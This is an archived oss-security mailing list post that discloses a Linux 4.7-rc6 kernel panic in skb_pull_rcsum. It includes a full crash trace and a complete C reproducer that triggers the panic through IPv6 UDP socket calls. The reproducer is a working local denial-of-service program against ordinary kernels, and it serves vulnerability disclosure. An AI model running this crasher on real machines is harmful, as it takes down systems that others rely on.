Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 5 Jul 2016 18:36:55 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Subject: BUG_ON crash in linux 4.7-rc6/master skbuff.c

Hi,

this program will crash the linux kernel 4.7-rc6 and current master in a
voluntary panic() call triggered at a BUG_ON in net/core/skbuff.c:3051

kernel BUG at net/core/skbuff.c:3051!

in a qemu environment with kASAN enabled in a syzkaller-kind setup

---- crash trace ----

[   59.831394] kernel BUG at net/core/skbuff.c:3051!
[   59.831802] invalid opcode: 0000 [#1] SMP KASAN
[   59.832193] Modules linked in:
[   59.832488] CPU: 0 PID: 1651 Comm: derp2 Not tainted 4.7.0-rc6 #1
[   59.833022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   59.833827] task: ffff8800ba26c740 ti: ffff8800b8ba8000 task.ti:
ffff8800b8ba8000
[   59.834498] RIP: 0010:[<ffffffff8292611c>]  [<ffffffff8292611c>]
skb_pull_rcsum+0x1ec/0x2c0
[   59.835238] RSP: 0018:ffff88011b007768  EFLAGS: 00010206
[   59.835705] RAX: ffff8800ba26c740 RBX: ffff880119c338c0 RCX:
ffff880119c33940
[   59.836311] RDX: 0000000000000100 RSI: 0000000000000008 RDI:
ffff880119c33940
[   59.836916] RBP: ffff88011b007798 R08: ffff88011b007700 R09:
0000000000000001
[   59.837521] R10: 1ffff10017742929 R11: ffff880119c33982 R12:
0000000000000001
[   59.838141] R13: 0000000000000008 R14: ffff880119c33998 R15:
ffff8800b88ce490
[   59.838767] FS:  0000000002454880(0000) GS:ffff88011b000000(0000)
knlGS:0000000000000000
[   59.839522] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   59.840017] CR2: 0000000020013000 CR3: 00000000b9940000 CR4:
00000000000006f0
[   59.840631] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[   59.841242] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
[   59.841851] Stack:
[   59.842033]  ffff88011b007798 ffff880119c338c0 ffff8800b93d3980
0000000000000000
[   59.842759]  0000000000000000 ffffffff83a8a200 ffff88011b0077f0
ffffffff82c54dba
[   59.843430]  ffff880100000000 0000000000000000 00000001ab123950
ffffffff83a8a200
[   59.844102] Call Trace:
[   59.844317]  <IRQ>
[   59.844495]  [<ffffffff82c54dba>] udpv6_queue_rcv_skb+0x4fa/0x15b0
[   59.845048]  [<ffffffff82c56b36>] __udp6_lib_rcv+0xcc6/0x1d20
[   59.845540]  [<ffffffff82c57bb1>] udpv6_rcv+0x21/0x30
[   59.845975]  [<ffffffff82bf5971>] ip6_input_finish+0x3a1/0x1170
[   59.846510]  [<ffffffff82bf7faa>] ip6_input+0xda/0x1f0
[   59.846950]  [<ffffffff82bf7ed0>] ? ipv6_rcv+0x1790/0x1790
[   59.847418]  [<ffffffff8296ce36>] ? __netif_receive_skb+0x36/0x170
[   59.847944]  [<ffffffff8296d024>] ? netif_receive_skb_internal+0xb4/0x210
[   59.848520]  [<ffffffff82bf53ae>] ip6_rcv_finish+0x11e/0x340
[   59.849002]  [<ffffffff82bf74f0>] ipv6_rcv+0xdb0/0x1790
[   59.849450]  [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[   59.849978]  [<ffffffff811fc519>] ? __enqueue_entity+0x139/0x230
[   59.850517]  [<ffffffff81206100>] ? update_curr+0x150/0x4e0
[   59.850993]  [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[   59.851520]  [<ffffffff8296be64>] __netif_receive_skb_core+0x1754/0x26f0
[   59.852101]  [<ffffffff8296a710>] ? netdev_info+0x120/0x120
[   59.852603]  [<ffffffff8120717b>] ? check_preempt_wakeup+0x50b/0xa70
[   59.853167]  [<ffffffff811e6cd4>] ? check_preempt_curr+0x204/0x350
[   59.853715]  [<ffffffff8296ce2f>] __netif_receive_skb+0x2f/0x170
[   59.854286]  [<ffffffff82971037>] process_backlog+0x197/0x580
[   59.854789]  [<ffffffff8296ea99>] net_rx_action+0x7c9/0xcf0
[   59.855264]  [<ffffffff8296e2d0>] ? sk_busy_loop+0xa00/0xa00
[   59.855760]  [<ffffffff822a8c90>] ? __e1000_maybe_stop_tx+0x200/0x200
[   59.856333]  [<ffffffff82d394d3>] ? __do_softirq+0x403/0x585
[   59.856829]  [<ffffffff82d3929e>] __do_softirq+0x1ce/0x585
[   59.857298]  [<ffffffff82d3800c>] do_softirq_own_stack+0x1c/0x30
[   59.857808]  <EOI>
[   59.857983]  [<ffffffff81172568>] do_softirq.part.19+0x38/0x40
[   59.858535]  [<ffffffff811725ed>] __local_bh_enable_ip+0x7d/0x80
[   59.859048]  [<ffffffff82be694d>] ip6_finish_output2+0x7dd/0x1510
[   59.859568]  [<ffffffff81c3f920>] ? __do_once_done+0x1a0/0x210
[   59.860066]  [<ffffffff82be6170>] ? dst_output+0x80/0x80
[   59.860520]  [<ffffffff8294d670>] ? skb_flow_dissector_init+0x290/0x290
[   59.861082]  [<ffffffff81c31c40>] ? copy_page_from_iter+0xa20/0xa20
[   59.861616]  [<ffffffff815c85a1>] ? memset+0x31/0x40
[   59.862042]  [<ffffffff82bf29f2>] ip6_finish_output+0x302/0x560
[   59.862578]  [<ffffffff82bf4259>] ? __ip6_make_skb+0x1279/0x1bc0
[   59.863127]  [<ffffffff82bf2da3>] ip6_output+0x153/0x390
[   59.863582]  [<ffffffff82bf2c50>] ? ip6_finish_output+0x560/0x560
[   59.864100]  [<ffffffff82bf2fe0>] ? ip6_output+0x390/0x390
[   59.864573]  [<ffffffff82cc3d57>] ip6_local_out+0x87/0xb0
[   59.865036]  [<ffffffff82bf4c2e>] ip6_send_skb+0x8e/0x1b0
[   59.865522]  [<ffffffff82c4decd>] udp_v6_send_skb+0x60d/0x1120
[   59.866021]  [<ffffffff82c4ec08>] udp_v6_push_pending_frames+0x228/0x340
[   59.866643]  [<ffffffff82c4e9e0>] ? udp_v6_send_skb+0x1120/0x1120
[   59.867164]  [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[   59.867677]  [<ffffffff82c5069e>] udpv6_sendmsg+0x189e/0x22e0
[   59.868168]  [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[   59.868693]  [<ffffffff82c4ee00>] ? udp_v6_flush_pending_frames+0xe0/0xe0
[   59.869285]  [<ffffffff813b3ee2>] ? is_ftrace_trampoline+0xc2/0xf0
[   59.869814]  [<ffffffff8109010a>] ? print_context_stack+0x6a/0xf0
[   59.870351]  [<ffffffff814ce4b0>] ? warn_alloc_failed+0x240/0x240
[   59.870883]  [<ffffffff815c2de4>] ? deactivate_slab+0x134/0x3d0
[   59.871387]  [<ffffffff815c1f93>] ? alloc_debug_processing+0x73/0x1b0
[   59.871936]  [<ffffffff82b387bc>] inet_sendmsg+0x24c/0x350
[   59.872405]  [<ffffffff82b38570>] ? inet_recvmsg+0x3d0/0x3d0
[   59.872913]  [<ffffffff829081ff>] sock_sendmsg+0xcf/0x110
[   59.873389]  [<ffffffff82908462>] sock_write_iter+0x222/0x3c0
[   59.873879]  [<ffffffff82908240>] ? sock_sendmsg+0x110/0x110
[   59.874394]  [<ffffffff82c94c07>] ? ip6_datagram_release_cb+0x1e7/0x260
[   59.874969]  [<ffffffff81c2a6cf>] ? iov_iter_init+0xaf/0x1d0
[   59.875453]  [<ffffffff8161d71b>] __vfs_write+0x3cb/0x640
[   59.875915]  [<ffffffff8161d350>] ? default_llseek+0x2c0/0x2c0
[   59.876412]  [<ffffffff81ac3fd7>] ? apparmor_file_permission+0x27/0x30
[   59.876969]  [<ffffffff8162106a>] ? rw_verify_area+0xea/0x2b0
[   59.877460]  [<ffffffff816216b5>] vfs_write+0x175/0x4a0
[   59.877907]  [<ffffffff81624f18>] SyS_write+0xd8/0x1b0
[   59.878364]  [<ffffffff81624e40>] ? SyS_read+0x1b0/0x1b0
[   59.878831]  [<ffffffff811271c9>] ? trace_do_page_fault+0x79/0x240
[   59.879362]  [<ffffffff82d36476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   59.879907] Code: fc ff df 48 89 fa 48 c1 ea 03 0f b6 04 02 84 c0 74 08
3c 03 0f 8e ba 00 00 00 80 a3 91 00 00 00 f9 e9 4a ff ff ff e8 b4 fe a4 fe
<0f> 0b e8 ad fe a4 fe 0f 0b e8 a6 fe a4 fe 31 d2 4c 89 ff 44 89
[   59.882261] RIP  [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0
[   59.882798]  RSP <ffff88011b007768>
[   59.883143] ---[ end trace d7d3f86c27f0e339 ]---
[   59.883546] Kernel panic - not syncing: Fatal exception in interrupt
[   59.884589] Kernel Offset: disabled
[   59.884906] ---[ end Kernel panic - not syncing: Fatal exception in
interrupt

--- reproducer --- derp2.c ---- gcc derp2.c -o derp2

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

long r[22];

int main()
{
memset(r, -1, sizeof(r));
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x1e000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
r[1] = syscall(SYS_socket, 0xaul, 0x2ul, 0x0ul, 0, 0, 0);
memcpy((void*)0x20006000,
"\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
128);
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
memcpy((void*)0x20017f5a,
"\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\xcc\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1",
166);
memcpy((void*)0x200001a2,
"\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0",
28);
r[6] = syscall(SYS_sendto, r[1], 0x20017f5aul, 0xa6ul,
0x249e4e54fe149d8cul, 0x200001a2ul, 0x1cul);
*(uint16_t*)0x2001dff0 = (uint16_t)0x1;
*(uint64_t*)0x2001dff8 = (uint64_t)0x2001d000;
*(uint16_t*)0x2001d000 = (uint16_t)0x6;
*(uint8_t*)0x2001d002 = (uint8_t)0x4e6;
*(uint8_t*)0x2001d003 = (uint8_t)0x0;
*(uint32_t*)0x2001d004 = (uint32_t)0x1;
r[13] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x1aul, 0x2001dff0ul, 0x10ul,
0);
r[14] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
*(uint32_t*)0x20013000 = (uint32_t)0x28;
*(uint32_t*)0x20013004 = (uint32_t)0x2;
*(uint64_t*)0x20013008 = (uint64_t)0x0;
*(uint64_t*)0x20013010 = (uint64_t)0xfffffffffffffff7;
*(uint64_t*)0x20013018 = (uint64_t)0x7;
*(uint16_t*)0x20013020 = (uint16_t)0x1;
r[21] = syscall(SYS_write, r[14], 0x20013000ul, 0x28ul, 0, 0, 0);
return 0;
}

----

thank you

Marco

https://marcograss.github.io

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.